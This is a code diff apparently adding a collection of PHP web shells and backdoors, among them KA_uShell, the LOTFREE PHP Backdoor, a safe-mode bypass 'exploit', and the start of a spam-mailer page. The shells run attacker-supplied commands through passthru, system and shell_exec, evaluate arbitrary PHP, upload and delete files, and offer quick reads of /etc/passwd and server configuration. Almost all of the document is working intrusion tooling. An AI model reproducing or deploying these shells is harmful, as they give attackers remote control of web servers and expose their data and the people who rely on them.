+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////�������/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //���������� �������
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //���������� �������
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //����� SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //������ �����
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //����������� �������
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //������� ����
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>   ".$fil."   </b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "
\ No newline at end of file
diff --git a/xakep-shells/PHP/KA_uShell.php.php.txt b/xakep-shells/PHP/KA_uShell.php.php.txt
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/xakep-shells/PHP/KA_uShell.php.php.txt
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "��� ����?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "��������������� �����:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "������������ �����:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "������������ �����:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>�����:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>�����:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="�������"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "����� ������� �������� � ����� $uploadfile\n";
+    echo "���:" .$_FILES['file']['name']. "\n";
+    echo "������:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "�� ������ ��������� �����. ����:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>�����:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>���� ������:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "�� ���� ������� �����";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt b/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt	
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "��� ����?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "��������������� �����:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "������������ �����:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "������������ �����:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>�����:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>�����:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="�������"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "����� ������� �������� � ����� $uploadfile\n";
+    echo "���:" .$_FILES['file']['name']. "\n";
+    echo "������:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "�� ������ ��������� �����. ����:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>�����:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>���� ������:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "�� ���� ������� �����";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/LOTFREE.php.php.txt b/xakep-shells/PHP/LOTFREE.php.php.txt
new file mode 100644
index 0000000..06f2321
--- /dev/null
+++ b/xakep-shells/PHP/LOTFREE.php.php.txt
@@ -0,0 +1,133 @@
+<?php
+function good_link($link)
+{
+  $link=ereg_replace("/+","/",$link);
+  $link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
+  $link=ereg_replace("/+","/",$link);
+  if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
+  if($link=="")$link=".";
+  return $link;
+}
+
+$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
+$dir=good_link($dir);
+$rep=opendir($dir);
+chdir($dir);
+
+if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
+{
+  header("Content-Type: application/octet-stream");
+  header("Content-Length: ".filesize($_REQUEST["down"]));
+  header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
+  readfile($_REQUEST["down"]);
+  exit();
+}
+?>
+<html>
+<head><title>LOTFREE PHP Backdoor v1.5</title></head>
+<body>
+<br>
+<?php
+  echo "Actuellement dans <b>".getcwd()."</b><br>\n";
+  echo "<b>dir = '$dir'</b><br>\n";
+  echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
+ 
+  if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
+  {
+    echo "<pre>\n";
+    system($_REQUEST['cmd']);
+    echo "</pre>\n";
+  }
+
+  if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
+  {
+    if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
+    {
+      if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
+      {
+        echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
+      }
+      else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
+    }
+    else echo "fichier trop gros!<br>\n";
+  }
+
+  if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
+  {
+    if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
+    else echo "Impossible de supprimer le fichier<br>\n";
+  }
+
+?>
+<hr>
+<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
+<?php
+  $t_dir=array();
+  $t_file=array();
+  $i_dir=0;
+  $i_file=0;
+  while($x=readdir($rep))
+  {
+    if(is_dir($x))$t_dir[$i_dir++]=$x;
+    else $t_file[$i_file++]=$x;
+  }
+  closedir($rep);
+  while(1)
+  {
+?>
+<tr>
+  <td width="20%" bgcolor="lightgray" valign="top">
+<?php
+    if($x=each($t_dir))
+    {
+      $name=$x["value"];
+      if($name=='.'){}
+      elseif($name=='..') echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
+      else echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
+    }
+?>
+  </td>
+  <td width='78%'<?php
+    if($y=each($t_file))
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
+      else echo ">\n";
+      echo "    <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
+    }
+    else echo ">\n";
+?>
+  </td>
+  <td valign='center' width='2%'<?php
+    if($y)
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'";
+      echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
+    }
+    else echo ">\n";
+?></td>
+</tr>
+<?php
+    if(!$x && !$y)break;
+  }
+?>
+</table>
+<hr>
+<br>
+<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
+<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
+</form><br>
+Uploader un fichier dans le repertoire courant :<br>
+<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
+<input type="submit" value="upl0ad!"></form><br>
+<br>
+<center>
+PHP Backdoor Version 1.5<br>
+by sirius_black / LOTFREE TEAM<br>
+Execute commands, browse the filesystem<br>
+Upload, download and delete files...<br>
+<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
+</center>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt b/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt
new file mode 100644
index 0000000..06a3035
--- /dev/null
+++ b/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	
@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="�al��t�r" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>H�zl� Men� :=) :</font><select size="1" name="liz0">
+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">T�m A��k Portalar� G�r</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="G�ster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonu�lar�:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt b/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt	
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
